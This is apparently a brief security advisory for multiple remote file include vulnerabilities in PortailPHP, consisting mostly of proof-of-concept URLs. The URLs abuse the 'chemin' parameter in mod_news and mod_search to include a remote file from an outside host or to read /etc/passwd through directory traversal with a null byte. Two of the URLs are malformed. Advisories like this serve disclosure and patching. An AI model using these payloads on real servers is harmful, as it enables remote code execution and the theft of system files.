PortailPHP Multiple Remote File Include Vulnerabilities

PortailPHP Multiple Remote File Include Vulnerabilities

An attacker may exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/mod_news/index.php?chemin=http://site.com/file.txt?%00

http://www.example.commod_news/index.php?chemin=../../../../../../../../../../../../../etc/passwd%00

http://www.example.com/mod_news/goodies.php?chemin=../../../../../../../../../../../../../etc/passwd%00

http://www.example.com/mod_news/goodies.php?chemin=http://site.com/file.txt?%00

http://www.example.commod_search/index.php?chemin=http://site.com/file.txt?%00